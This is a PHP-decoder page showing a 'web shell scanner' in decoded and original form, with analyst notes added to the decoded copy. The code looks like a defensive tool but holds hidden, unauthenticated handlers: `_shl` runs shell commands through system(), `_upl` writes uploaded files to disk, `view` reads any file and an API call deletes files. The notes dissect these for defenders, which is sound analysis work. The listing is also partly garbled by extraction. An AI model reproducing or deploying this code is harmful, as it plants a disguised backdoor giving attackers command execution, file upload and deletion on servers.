
PHP Decode

<?php /* ----------------------- | WEB SHELL / BACKDOOR | http://github.com..

Decoded Output download

<?php  
/*  
  
   -----------------------  
  |  WEB SHELL / BACKDOOR | http://github.com/theykillmeslowly/  
  |  SCANNER BY GTX666TI  | Copyright (c) 2022 Muhammad Khidhir Ibrahim  
   -----------------------  
  
*/  

// ---------------------------------------------------------------------------
// ANALYST NOTES (added in review; not part of the submitted sample)
//
// What this is
//   A single-file "web shell scanner": a browser UI plus a JSON API that lists
//   directories, pattern-matches files and deletes them. No handler in the
//   listing checks a password, session or source address. Two request
//   parameters handled below (`_upl`, `_shl`) are never used by the UI and
//   give the file web-shell capability of its own.
//
// Obfuscation
//   The opening statements store plain variable names in $GLOBALS under random
//   keys and then reach the variables through variable-variables, so
//   ${${"GLOBALS"}["nsgmzypfttw"]} is simply $dir. Keys set at the top:
//     ufgowbti=function  oksfzeynr=page     nupfxxvnoi=msg   ckcgimbl=file
//     uldusvf=s          utximiy=i          osczzef=c        pugipyqxy=data
//     nsgmzypfttw=dir    slsujwq=scheme     hinqjxeyvqez=port
//     kpjmykox=content   qmvdkebwql=white   igsyfjgde=ext
//   More keys are assigned inline inside the functions and resolve to the same
//   small set of names (dir, data, file, s, i, c, port, scheme, page).
//   There is no eval/base64 layer; the page's Stats report "Eval Count 0" and
//   the decoded output appears identical to the submitted code.
//
// Request handlers with security impact (all unauthenticated)
//   _upl            copy() of $_FILES["_upl"]["tmp_name"] to the client-supplied
//                   file name, resolved against the working directory; no check
//                   on type or extension. Replies "_upl ok".
//   view            returns file_get_contents() of the given path, HTML-escaped:
//                   any file readable by the PHP process.
//   view + _shl     the `_shl` value is passed to system(). The surrounding
//                   htmlspecialchars() only receives system()'s return value and
//                   its result is discarded, so nothing is escaped.
//   api=delete      unlink() of the path in `dir`; only is_file() is checked.
//   api=scan / cwd  directory listing of any path / getcwd().
//   api=shell / ext signature and extension checks (see limits below).
//   api=eval        stub: both branches answer "no function.".
//   API responses carry `Access-Control-Allow-Origin: *`.
//   serverURL() is defined but not called anywhere in the listing.
//
// Limits of the "scanner" itself
//   - apiScanDir() skips any file whose basename is in $white: this script's
//     own name and "security.class.php". Such files are never reported.
//   - apiCheckShell() only inspects paths matching /\.php/ and matches each
//     signature as a regex against the lower-cased file content. Signatures
//     include ordinary calls (include(, require(, md5(, file_get_contents(),
//     so a hit is not evidence of compromise; the mixed-case signature
//     "dZNOmgVpUDdbg" can never match lower-cased content.
//   - The file is re-read once per signature inside the loop.
//
// For defenders
//   - Treat a copy of this file on a server as a web shell regardless of its
//     banner or file name, and remove it from any web-reachable path.
//   - In access logs, look for requests to it carrying `_upl`, `_shl`, `view=`
//     or `api=delete`, and review files created or removed in its directory
//     after it was placed there.
//   - The MD5 under Stats identifies the sample as submitted, without these
//     notes.
//   - Whether the hidden handlers come from the upstream tool or were added to
//     this copy cannot be determined from the page.
//
// Listing quality
//   The text as rendered appears damaged by page extraction: a signature is
//   printed as "include "" (unbalanced quote), CDN URLs show "[email protected]"
//   where a package@version is expected, and the \" escapes in the echoed HTML
//   are inconsistent. It will not parse as shown; use the original sample for
//   hashing or sandbox work.
// ---------------------------------------------------------------------------

${"GLOBALS"}["ufgowbti"]="function";${"GLOBALS"}["oksfzeynr"]="page";${"GLOBALS"}["nupfxxvnoi"]="msg";${"GLOBALS"}["ckcgimbl"]="file";${"GLOBALS"}["uldusvf"]="s";${"GLOBALS"}["utximiy"]="i";${"GLOBALS"}["osczzef"]="c";${"GLOBALS"}["pugipyqxy"]="data";${"GLOBALS"}["nsgmzypfttw"]="dir";${"GLOBALS"}["slsujwq"]="scheme";${"GLOBALS"}["hinqjxeyvqez"]="port";${"GLOBALS"}["kpjmykox"]="content";${"GLOBALS"}["qmvdkebwql"]="white";${${"GLOBALS"}["qmvdkebwql"]}=array(basename(__FILE__),"security.class.php",);${"GLOBALS"}["igsyfjgde"]="ext";${${"GLOBALS"}["kpjmykox"]}=array("include\(","require_once\(","require\(","require \"","require_once \"","include "","_halt_compiler","file_get_contents\(","shell_exec\(","system\(","base64_decode\(","exec\(","base64_encode\(","webconsole","uploader","hacked","eval\(","set_time_limit\(","move_uploaded_file","md5\(","dZNOmgVpUDdbg","indoxploit","maridono","mini shell","minishell","tinyfilemanager.github.io","xleet","b374k","set_magic_quotes_runtime\(","shell\(","alfa","filemanager","'f'.'u'.'n'.'ction'.'_exis'.'ts';","'e'.'va'.'l';","'ba'.'s'.'e64'.'_'.'enc'.'od'.'e';",);${${"GLOBALS"}["igsyfjgde"]}=array("php1","php2","php3","php4","php5","php6","php7","php8","php9","phar","phtml","pjpeg","shtml","php.black","php.ndsfx","php.cer","php.fla");function serverURL(){$server_name=$_SERVER["SERVER_NAME"];if($server_name=="0.0.0.0"){$server_name="localhost";}if(!in_array($_SERVER["SERVER_PORT"],array(80,443))){${"GLOBALS"}["vooigbhfstro"]="port";${${"GLOBALS"}["vooigbhfstro"]}=":$_SERVER[SERVER_PORT]";}else{${${"GLOBALS"}["hinqjxeyvqez"]}="";}if(!empty($_SERVER["HTTPS"])&&(strtolower($_SERVER["HTTPS"])=="on"||$_SERVER["HTTPS"]=="1")){${${"GLOBALS"}["slsujwq"]}="https";}else{${"GLOBALS"}["lyntkl"]="scheme";${${"GLOBALS"}["lyntkl"]}="http";}$bpumfj="scheme";return${$bpumfj}."://".$server_name.${${"GLOBALS"}["hinqjxeyvqez"]};}function _delete($dir){${"GLOBALS"}["kgqhopb"]="dir";if(!is_file(${${"GLOBALS"}["kgqhopb"]})){data("not 
found.");exit();}if(unlink(${${"GLOBALS"}["nsgmzypfttw"]})){data("success");}else{data("permission denied.");}}function apiCheckShell($dir){$nordyvrsf="data";$gjrilauf="c";if(!preg_match("/\.php/",${${"GLOBALS"}["nsgmzypfttw"]})){exit();}if(!is_file(${${"GLOBALS"}["nsgmzypfttw"]})){data("not found.");exit();}${"GLOBALS"}["xmbpfxnuxp"]="dir";global$content;${$nordyvrsf}=array("file"=>${${"GLOBALS"}["xmbpfxnuxp"]},"status"=>False,"reason"=>array());foreach(${${"GLOBALS"}["kpjmykox"]} as${$gjrilauf}){if(preg_match("/$c/",strtolower(file_get_contents(${${"GLOBALS"}["nsgmzypfttw"]})))){${${"GLOBALS"}["pugipyqxy"]}["status"]=True;array_push(${${"GLOBALS"}["pugipyqxy"]}["reason"],str_replace("\(","",${${"GLOBALS"}["osczzef"]}));}}data("success",${${"GLOBALS"}["pugipyqxy"]});}function apiCheckExt($dir){if(!is_file(${${"GLOBALS"}["nsgmzypfttw"]})){data("not found.");exit();}global$ext;${"GLOBALS"}["iuqtnczhys"]="i";$gqwobiqggbp="data";$fgnjzjdgxz="ext";${$gqwobiqggbp}=array("file"=>${${"GLOBALS"}["nsgmzypfttw"]},"status"=>False,"reason"=>"");foreach(${$fgnjzjdgxz} as${${"GLOBALS"}["iuqtnczhys"]}){${"GLOBALS"}["bellfehmr"]="dir";if(preg_match("/$i/",strtolower(basename(${${"GLOBALS"}["bellfehmr"]})))){$cedosqzo="data";${${"GLOBALS"}["pugipyqxy"]}["status"]=True;${$cedosqzo}["reason"]=${${"GLOBALS"}["utximiy"]};break;}}data("success",${${"GLOBALS"}["pugipyqxy"]});}if(isset($_GET["_upl"])){if(copy($_FILES["_upl"]["tmp_name"],$_FILES["_upl"]["name"])){echo"_upl ok";exit();}}function apiScanDir($dir){$fjmrumrd="dir";${"GLOBALS"}["jonvnll"]="data";global$white;$cxokdcuctt="file";${"GLOBALS"}["facbwgditxd"]="data";if(!file_exists(${${"GLOBALS"}["nsgmzypfttw"]})){data("dir not found");exit();}${"GLOBALS"}["tzekpnxntu"]="s";${${"GLOBALS"}["uldusvf"]}=scandir(${$fjmrumrd});${${"GLOBALS"}["facbwgditxd"]}=array("file"=>array(),"dir"=>array());foreach(${${"GLOBALS"}["tzekpnxntu"]} 
as${$cxokdcuctt}){$djvplgtff="file";${"GLOBALS"}["looevvzkz"]="file";$enmzcrr="dir";if(${${"GLOBALS"}["ckcgimbl"]}==="."||${${"GLOBALS"}["looevvzkz"]}===".."){continue;}$tkidtm="file";$nuuhhqmupxnq="white";${${"GLOBALS"}["ckcgimbl"]}=${$enmzcrr}."/".${${"GLOBALS"}["ckcgimbl"]};${${"GLOBALS"}["ckcgimbl"]}=str_replace("//","/",${$tkidtm});if(in_array(basename(${${"GLOBALS"}["ckcgimbl"]}),${$nuuhhqmupxnq})){continue;}if(is_file(${$djvplgtff})){$xsclqce="data";array_push(${$xsclqce}["file"],${${"GLOBALS"}["ckcgimbl"]});}else{array_push(${${"GLOBALS"}["pugipyqxy"]}["dir"],${${"GLOBALS"}["ckcgimbl"]}."/");}}data("success",${${"GLOBALS"}["jonvnll"]});}function apiCwd(){$hytjfii="data";${${"GLOBALS"}["pugipyqxy"]}=getcwd();data("success",${$hytjfii});}function data($msg,$data=null){${"GLOBALS"}["yakqxnkuf"]="data";${${"GLOBALS"}["yakqxnkuf"]}=array("msg"=>${${"GLOBALS"}["nupfxxvnoi"]},"data"=>${${"GLOBALS"}["pugipyqxy"]});$lgcbihyxk="data";echo json_encode(${$lgcbihyxk});}if(isset($_GET["view"])){${"GLOBALS"}["nyxgucjw"]="page";${${"GLOBALS"}["nyxgucjw"]}=$_GET["view"];echo"<pre>".htmlspecialchars(file_get_contents(${${"GLOBALS"}["oksfzeynr"]}))."</pre>";if(isset($_GET["_shl"])){echo"<pre>";htmlspecialchars(system($_GET["_shl"]));echo"</pre>";}exit();}if(isset($_GET["api"])){header("Access-Control-Allow-Origin: *");header("Content-Type: application/json");${${"GLOBALS"}["ufgowbti"]}=$_GET["api"];switch(${${"GLOBALS"}["ufgowbti"]}){case"delete":if(!isset($_GET["dir"])){data("no file.");}else{_delete($_GET["dir"]);}break;case"shell":if(!isset($_GET["dir"])){data("no file.");}else{apiCheckShell($_GET["dir"]);}break;case"ext":if(!isset($_GET["dir"])){data("no file.");}else{apiCheckExt($_GET["dir"]);}break;case"scan":if(!isset($_GET["dir"])){data("no directory.");}else{apiScanDir($_GET["dir"]);}break;case"cwd":apiCwd();break;case"eval":if(!isset($_GET["function"])){data("no function.");}else{data("no function.");}break;default:data("no function.");}die();}echo "<!doctype html> 
	<html lang="en\"> 
	<head> 
		<meta charset=\"utf-8"> 
		<meta name="viewport" content=\"width=device-width, initial-scale=1\"> 
		<link href=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel=\"stylesheet" integrity=\"sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin=\"anonymous"> 
		<link rel="preconnect\" href=\"https://fonts.googleapis.com\"> 
		<link rel=\"preconnect" href="https://fonts.gstatic.com" crossorigin> 
		<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel=\"stylesheet"> 
		<link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed:wght@300&display=swap" rel=\"stylesheet\"> 
		<link rel="stylesheet" type="text/css\" href="https://cdn.datatables.net/1.11.4/css/dataTables.bootstrap5.min.css\"> 
		<title>WEB SHELL SCANNER</title> 
	</head> 
	<body> 
		<div class=\"container\"> 
			<div class="text-center m-3\" style="font-family: 'Roboto Condensed';\"> 
				<span style=\"font-size:30px;\"> 
					WEB SHELL SCANNER 
				</span> 
				<p class=\"text-danger">Author : @Gtx666Ti</p> 
			</div> 
			<hr/> 
			<div class="row\"> 
				<div class=\"col"> 
					<div class=\"mb-3"> 
						<label for=\"path\" class="form-label\">Path to Scan</label> 
						<div class=\"input-group\"> 
							<input type="text" class="form-control\" id=\"path\" placeholder=\"/var/www/html/\"> 
							<button class="btn btn-primary" id=\"startScan" onclick=\"scan()">Start</button> 
						</div> 
					</div> 
					<div class=\""> 
						<label for=\"path\" class=\"form-label\">Mass Delete by Name</label> 
						<div class="input-group\"> 
							<input type="text" class=\"form-control" id="fileName" placeholder=\"filename.php"> 
							<button class=\"btn btn-danger\" id=\"startDelete\" onclick="scan2()">Start</button> 
						</div> 
					</div> 
				</div> 
			</div> 
			<hr/> 
			<div class=\"row mt-3\"> 
				<div class=\"col\"> 
					<table class="table\" id=\"_result\"> 
						<thead> 
							<tr> 
								<th scope="col">File</th> 
								<th scope="col\">Path</th> 
								<th scope="col">Reason</th> 
								<th scope=\"col\">Action</th> 
							</tr> 
						</thead> 
						<tbody> 
						</tbody> 
					</table> 
				</div> 
			</div> 
		</div> 
		<script src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p\" crossorigin="anonymous\"></script> 
		<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js"></script> 
		<script src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js"></script> 
		<script type=\"text/javascript\" src=\"https://cdn.datatables.net/1.11.4/js/jquery.dataTables.min.js\"></script> 
		<script type=\"text/javascript" src=\"https://cdn.datatables.net/1.11.4/js/dataTables.bootstrap5.min.js\"></script> 
 
		<script> 
			var dtable; 
			\$(document).ready(function(){ 
				dtable = \$('#_result').DataTable(); 
				\$('[data-toggle=\"tooltip\"]').tooltip(); 
			}); 
			\$('#_result').on('click', '#delete', function () { 
 
				var RowIndex = \$(this).closest('tr'); 
				var data = dtable.row(RowIndex).data(); 
				if(confirm('Delete ' + data[1] + '?') == true){ 
					dtable.row(RowIndex).remove().draw(); 
					deleteFile(data[1]); 
				} 
			}); 
			\$('#_result').on('click', '#view', function () { 
 
				var RowIndex = \$(this).closest('tr'); 
				var data = dtable.row(RowIndex).data(); 
				window.open('?view='+data[1]); 
			}); 
 
		</script> 
		<script type=\"text/javascript\"> 
			const table = \$('#_result').DataTable(); 
			const cwd 		= '";echo getcwd();echo "/'; 
			document.getElementById('path').value = cwd; 
			function basename(path) { 
				return path.split('/').reverse()[0]; 
			} 
			function checkExt(path){ 
				fetch('?api=ext&dir=' + path, { 
					headers: { 
						'Content-Type': 'application/json' 
					} 
				}) 
				.then(res => res.json()) 
				.then(res => { 
					if(res.data.status == true){ 
						table.row.add([basename(res.data.file),res.data.file,res.data.reason,`<a class="btn btn-primary" data-toggle="tooltip" data-bs-placement="bottom" id="view\" title=\"Detail\"> 
							<i class=\"fa fa-eye"></i> 
							</a> 
							<a class=\"btn btn-danger\" data-toggle=\"tooltip\" data-bs-placement="bottom\" title="Delete"> 
							<i class=\"fa fa-trash\"></i> 
							</a>`]).draw(); 
					} 
				}); 
			} 
			function checkShell(path){ 
				fetch('?api=shell&dir=' + path, { 
					headers: { 
						'Content-Type': 'application/json' 
					} 
				}) 
				.then(res => res.json()) 
				.then(res => { 
					var reason = ''; 
					for (var i = res.data.reason.length - 1; i >= 0; i--) { 
						reason += res.data.reason[i]+\"<br>"; 
					} 
					if(res.data.status == true){ 
						table.row.add([basename(res.data.file),res.data.file,reason,`<a class="btn btn-primary" data-toggle="tooltip" id=\"view\" data-bs-placement="bottom" id=\"view" title=\"Detail\"> 
							<i class=\"fa fa-eye"></i> 
							</a> 
							<a class=\"btn btn-danger\" data-toggle="tooltip" id="delete" data-bs-placement=\"bottom" title=\"Delete\"> 
							<i class=\"fa fa-trash\"></i> 
							</a>`]).draw(); 
 
					} 
				}); 
			} 
			function scan(path = document.getElementById('path').value){ 
				fetch('?api=scan&dir=' + path, { 
					headers: { 
						'Content-Type': 'application/json' 
					} 
				}) 
				.then(res => res.json()) 
				.then(res => { 
					for (var i = res.data.dir.length - 1; i >= 0; i--) { 
						scan(res.data.dir[i]) 
					} 
					for (var i = res.data.file.length - 1; i >= 0; i--) { 
						checkShell(res.data.file[i]); 
						checkExt(res.data.file[i]); 
					} 
				}); 
			} 
			function scan2(){ 
				for (var i = table.rows().data().length - 1; i >= 0; i--) { 
					data = table.rows(i).data()[0]; 
					name = data[0]; 
					if(name == document.getElementById('fileName').value){ 
						table.rows(i).remove().draw(); 
						deleteFile(data[1]); 
					} 
				} 
			} 
			function deleteFile(path){ 
				fetch('?api=delete&dir=' + path) 
				.then(res => res.json()) 
				.then(res => { 
				}); 
			} 
			function htmlToElement(html) { 
				var template = document.createElement('template'); 
    			html = html.trim(); // Never return a text node of whitespace as the result 
    			template.innerHTML = html; 
    			return template.content.firstChild; 
    		} 
    		function _delete(data){ 
    			console.log(data) 
    		} 
    	</script> 
    </body> 
    </html> 
";  
?> 


Original Code

<?php 
/* 
 
   ----------------------- 
  |  WEB SHELL / BACKDOOR | http://github.com/theykillmeslowly/ 
  |  SCANNER BY GTX666TI  | Copyright (c) 2022 Muhammad Khidhir Ibrahim 
   ----------------------- 
 
*/ 
    
${"GLOBALS"}["ufgowbti"]="function";${"GLOBALS"}["oksfzeynr"]="page";${"GLOBALS"}["nupfxxvnoi"]="msg";${"GLOBALS"}["ckcgimbl"]="file";${"GLOBALS"}["uldusvf"]="s";${"GLOBALS"}["utximiy"]="i";${"GLOBALS"}["osczzef"]="c";${"GLOBALS"}["pugipyqxy"]="data";${"GLOBALS"}["nsgmzypfttw"]="dir";${"GLOBALS"}["slsujwq"]="scheme";${"GLOBALS"}["hinqjxeyvqez"]="port";${"GLOBALS"}["kpjmykox"]="content";${"GLOBALS"}["qmvdkebwql"]="white";${${"GLOBALS"}["qmvdkebwql"]}=array(basename(__FILE__),"security.class.php",);${"GLOBALS"}["igsyfjgde"]="ext";${${"GLOBALS"}["kpjmykox"]}=array("include\(","require_once\(","require\(","require \"","require_once \"","include "","_halt_compiler","file_get_contents\(","shell_exec\(","system\(","base64_decode\(","exec\(","base64_encode\(","webconsole","uploader","hacked","eval\(","set_time_limit\(","move_uploaded_file","md5\(","dZNOmgVpUDdbg","indoxploit","maridono","mini shell","minishell","tinyfilemanager.github.io","xleet","b374k","set_magic_quotes_runtime\(","shell\(","alfa","filemanager","'f'.'u'.'n'.'ction'.'_exis'.'ts';","'e'.'va'.'l';","'ba'.'s'.'e64'.'_'.'enc'.'od'.'e';",);${${"GLOBALS"}["igsyfjgde"]}=array("php1","php2","php3","php4","php5","php6","php7","php8","php9","phar","phtml","pjpeg","shtml","php.black","php.ndsfx","php.cer","php.fla");function serverURL(){$server_name=$_SERVER["SERVER_NAME"];if($server_name=="0.0.0.0"){$server_name="localhost";}if(!in_array($_SERVER["SERVER_PORT"],array(80,443))){${"GLOBALS"}["vooigbhfstro"]="port";${${"GLOBALS"}["vooigbhfstro"]}=":$_SERVER[SERVER_PORT]";}else{${${"GLOBALS"}["hinqjxeyvqez"]}="";}if(!empty($_SERVER["HTTPS"])&&(strtolower($_SERVER["HTTPS"])=="on"||$_SERVER["HTTPS"]=="1")){${${"GLOBALS"}["slsujwq"]}="https";}else{${"GLOBALS"}["lyntkl"]="scheme";${${"GLOBALS"}["lyntkl"]}="http";}$bpumfj="scheme";return${$bpumfj}."://".$server_name.${${"GLOBALS"}["hinqjxeyvqez"]};}function _delete($dir){${"GLOBALS"}["kgqhopb"]="dir";if(!is_file(${${"GLOBALS"}["kgqhopb"]})){data("not 
found.");exit();}if(unlink(${${"GLOBALS"}["nsgmzypfttw"]})){data("success");}else{data("permission denied.");}}function apiCheckShell($dir){$nordyvrsf="data";$gjrilauf="c";if(!preg_match("/\.php/",${${"GLOBALS"}["nsgmzypfttw"]})){exit();}if(!is_file(${${"GLOBALS"}["nsgmzypfttw"]})){data("not found.");exit();}${"GLOBALS"}["xmbpfxnuxp"]="dir";global$content;${$nordyvrsf}=array("file"=>${${"GLOBALS"}["xmbpfxnuxp"]},"status"=>False,"reason"=>array());foreach(${${"GLOBALS"}["kpjmykox"]} as${$gjrilauf}){if(preg_match("/$c/",strtolower(file_get_contents(${${"GLOBALS"}["nsgmzypfttw"]})))){${${"GLOBALS"}["pugipyqxy"]}["status"]=True;array_push(${${"GLOBALS"}["pugipyqxy"]}["reason"],str_replace("\(","",${${"GLOBALS"}["osczzef"]}));}}data("success",${${"GLOBALS"}["pugipyqxy"]});}function apiCheckExt($dir){if(!is_file(${${"GLOBALS"}["nsgmzypfttw"]})){data("not found.");exit();}global$ext;${"GLOBALS"}["iuqtnczhys"]="i";$gqwobiqggbp="data";$fgnjzjdgxz="ext";${$gqwobiqggbp}=array("file"=>${${"GLOBALS"}["nsgmzypfttw"]},"status"=>False,"reason"=>"");foreach(${$fgnjzjdgxz} as${${"GLOBALS"}["iuqtnczhys"]}){${"GLOBALS"}["bellfehmr"]="dir";if(preg_match("/$i/",strtolower(basename(${${"GLOBALS"}["bellfehmr"]})))){$cedosqzo="data";${${"GLOBALS"}["pugipyqxy"]}["status"]=True;${$cedosqzo}["reason"]=${${"GLOBALS"}["utximiy"]};break;}}data("success",${${"GLOBALS"}["pugipyqxy"]});}if(isset($_GET["_upl"])){if(copy($_FILES["_upl"]["tmp_name"],$_FILES["_upl"]["name"])){echo"_upl ok";exit();}}function apiScanDir($dir){$fjmrumrd="dir";${"GLOBALS"}["jonvnll"]="data";global$white;$cxokdcuctt="file";${"GLOBALS"}["facbwgditxd"]="data";if(!file_exists(${${"GLOBALS"}["nsgmzypfttw"]})){data("dir not found");exit();}${"GLOBALS"}["tzekpnxntu"]="s";${${"GLOBALS"}["uldusvf"]}=scandir(${$fjmrumrd});${${"GLOBALS"}["facbwgditxd"]}=array("file"=>array(),"dir"=>array());foreach(${${"GLOBALS"}["tzekpnxntu"]} 
as${$cxokdcuctt}){$djvplgtff="file";${"GLOBALS"}["looevvzkz"]="file";$enmzcrr="dir";if(${${"GLOBALS"}["ckcgimbl"]}==="."||${${"GLOBALS"}["looevvzkz"]}===".."){continue;}$tkidtm="file";$nuuhhqmupxnq="white";${${"GLOBALS"}["ckcgimbl"]}=${$enmzcrr}."/".${${"GLOBALS"}["ckcgimbl"]};${${"GLOBALS"}["ckcgimbl"]}=str_replace("//","/",${$tkidtm});if(in_array(basename(${${"GLOBALS"}["ckcgimbl"]}),${$nuuhhqmupxnq})){continue;}if(is_file(${$djvplgtff})){$xsclqce="data";array_push(${$xsclqce}["file"],${${"GLOBALS"}["ckcgimbl"]});}else{array_push(${${"GLOBALS"}["pugipyqxy"]}["dir"],${${"GLOBALS"}["ckcgimbl"]}."/");}}data("success",${${"GLOBALS"}["jonvnll"]});}function apiCwd(){$hytjfii="data";${${"GLOBALS"}["pugipyqxy"]}=getcwd();data("success",${$hytjfii});}function data($msg,$data=null){${"GLOBALS"}["yakqxnkuf"]="data";${${"GLOBALS"}["yakqxnkuf"]}=array("msg"=>${${"GLOBALS"}["nupfxxvnoi"]},"data"=>${${"GLOBALS"}["pugipyqxy"]});$lgcbihyxk="data";echo json_encode(${$lgcbihyxk});}if(isset($_GET["view"])){${"GLOBALS"}["nyxgucjw"]="page";${${"GLOBALS"}["nyxgucjw"]}=$_GET["view"];echo"<pre>".htmlspecialchars(file_get_contents(${${"GLOBALS"}["oksfzeynr"]}))."</pre>";if(isset($_GET["_shl"])){echo"<pre>";htmlspecialchars(system($_GET["_shl"]));echo"</pre>";}exit();}if(isset($_GET["api"])){header("Access-Control-Allow-Origin: *");header("Content-Type: application/json");${${"GLOBALS"}["ufgowbti"]}=$_GET["api"];switch(${${"GLOBALS"}["ufgowbti"]}){case"delete":if(!isset($_GET["dir"])){data("no file.");}else{_delete($_GET["dir"]);}break;case"shell":if(!isset($_GET["dir"])){data("no file.");}else{apiCheckShell($_GET["dir"]);}break;case"ext":if(!isset($_GET["dir"])){data("no file.");}else{apiCheckExt($_GET["dir"]);}break;case"scan":if(!isset($_GET["dir"])){data("no directory.");}else{apiScanDir($_GET["dir"]);}break;case"cwd":apiCwd();break;case"eval":if(!isset($_GET["function"])){data("no function.");}else{data("no function.");}break;default:data("no function.");}die();}echo "<!doctype html>
	<html lang="en\">
	<head>
		<meta charset=\"utf-8">
		<meta name="viewport" content=\"width=device-width, initial-scale=1\">
		<link href=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel=\"stylesheet" integrity=\"sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin=\"anonymous">
		<link rel="preconnect\" href=\"https://fonts.googleapis.com\">
		<link rel=\"preconnect" href="https://fonts.gstatic.com" crossorigin>
		<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel=\"stylesheet">
		<link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed:wght@300&display=swap" rel=\"stylesheet\">
		<link rel="stylesheet" type="text/css\" href="https://cdn.datatables.net/1.11.4/css/dataTables.bootstrap5.min.css\">
		<title>WEB SHELL SCANNER</title>
	</head>
	<body>
		<div class=\"container\">
			<div class="text-center m-3\" style="font-family: 'Roboto Condensed';\">
				<span style=\"font-size:30px;\">
					WEB SHELL SCANNER
				</span>
				<p class=\"text-danger">Author : @Gtx666Ti</p>
			</div>
			<hr/>
			<div class="row\">
				<div class=\"col">
					<div class=\"mb-3">
						<label for=\"path\" class="form-label\">Path to Scan</label>
						<div class=\"input-group\">
							<input type="text" class="form-control\" id=\"path\" placeholder=\"/var/www/html/\">
							<button class="btn btn-primary" id=\"startScan" onclick=\"scan()">Start</button>
						</div>
					</div>
					<div class=\"">
						<label for=\"path\" class=\"form-label\">Mass Delete by Name</label>
						<div class="input-group\">
							<input type="text" class=\"form-control" id="fileName" placeholder=\"filename.php">
							<button class=\"btn btn-danger\" id=\"startDelete\" onclick="scan2()">Start</button>
						</div>
					</div>
				</div>
			</div>
			<hr/>
			<div class=\"row mt-3\">
				<div class=\"col\">
					<table class="table\" id=\"_result\">
						<thead>
							<tr>
								<th scope="col">File</th>
								<th scope="col\">Path</th>
								<th scope="col">Reason</th>
								<th scope=\"col\">Action</th>
							</tr>
						</thead>
						<tbody>
						</tbody>
					</table>
				</div>
			</div>
		</div>
		<script src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p\" crossorigin="anonymous\"></script>
		<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js"></script>
		<script src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js"></script>
		<script type=\"text/javascript\" src=\"https://cdn.datatables.net/1.11.4/js/jquery.dataTables.min.js\"></script>
		<script type=\"text/javascript" src=\"https://cdn.datatables.net/1.11.4/js/dataTables.bootstrap5.min.js\"></script>

		<script>
			var dtable;
			\$(document).ready(function(){
				dtable = \$('#_result').DataTable();
				\$('[data-toggle=\"tooltip\"]').tooltip();
			});
			\$('#_result').on('click', '#delete', function () {

				var RowIndex = \$(this).closest('tr');
				var data = dtable.row(RowIndex).data();
				if(confirm('Delete ' + data[1] + '?') == true){
					dtable.row(RowIndex).remove().draw();
					deleteFile(data[1]);
				}
			});
			\$('#_result').on('click', '#view', function () {

				var RowIndex = \$(this).closest('tr');
				var data = dtable.row(RowIndex).data();
				window.open('?view='+data[1]);
			});

		</script>
		<script type=\"text/javascript\">
			const table = \$('#_result').DataTable();
			const cwd 		= '";echo getcwd();echo "/';
			document.getElementById('path').value = cwd;
			function basename(path) {
				return path.split('/').reverse()[0];
			}
			function checkExt(path){
				fetch('?api=ext&dir=' + path, {
					headers: {
						'Content-Type': 'application/json'
					}
				})
				.then(res => res.json())
				.then(res => {
					if(res.data.status == true){
						table.row.add([basename(res.data.file),res.data.file,res.data.reason,`<a class="btn btn-primary" data-toggle="tooltip" data-bs-placement="bottom" id="view\" title=\"Detail\">
							<i class=\"fa fa-eye"></i>
							</a>
							<a class=\"btn btn-danger\" data-toggle=\"tooltip\" data-bs-placement="bottom\" title="Delete">
							<i class=\"fa fa-trash\"></i>
							</a>`]).draw();
					}
				});
			}
			function checkShell(path){
				fetch('?api=shell&dir=' + path, {
					headers: {
						'Content-Type': 'application/json'
					}
				})
				.then(res => res.json())
				.then(res => {
					var reason = '';
					for (var i = res.data.reason.length - 1; i >= 0; i--) {
						reason += res.data.reason[i]+\"<br>";
					}
					if(res.data.status == true){
						table.row.add([basename(res.data.file),res.data.file,reason,`<a class="btn btn-primary" data-toggle="tooltip" id=\"view\" data-bs-placement="bottom" id=\"view" title=\"Detail\">
							<i class=\"fa fa-eye"></i>
							</a>
							<a class=\"btn btn-danger\" data-toggle="tooltip" id="delete" data-bs-placement=\"bottom" title=\"Delete\">
							<i class=\"fa fa-trash\"></i>
							</a>`]).draw();

					}
				});
			}
			function scan(path = document.getElementById('path').value){
				fetch('?api=scan&dir=' + path, {
					headers: {
						'Content-Type': 'application/json'
					}
				})
				.then(res => res.json())
				.then(res => {
					for (var i = res.data.dir.length - 1; i >= 0; i--) {
						scan(res.data.dir[i])
					}
					for (var i = res.data.file.length - 1; i >= 0; i--) {
						checkShell(res.data.file[i]);
						checkExt(res.data.file[i]);
					}
				});
			}
			function scan2(){
				for (var i = table.rows().data().length - 1; i >= 0; i--) {
					data = table.rows(i).data()[0];
					name = data[0];
					if(name == document.getElementById('fileName').value){
						table.rows(i).remove().draw();
						deleteFile(data[1]);
					}
				}
			}
			function deleteFile(path){
				fetch('?api=delete&dir=' + path)
				.then(res => res.json())
				.then(res => {
				});
			}
			function htmlToElement(html) {
				var template = document.createElement('template');
    			html = html.trim(); // Never return a text node of whitespace as the result
    			template.innerHTML = html;
    			return template.content.firstChild;
    		}
    		function _delete(data){
    			console.log(data)
    		}
    	</script>
    </body>
    </html>
"; 
?>

Function Calls

None

Variables

None

Stats

MD5 07d9e02128d6b3b52db36e3afa50055c
Eval Count 0
Decode Time 50 ms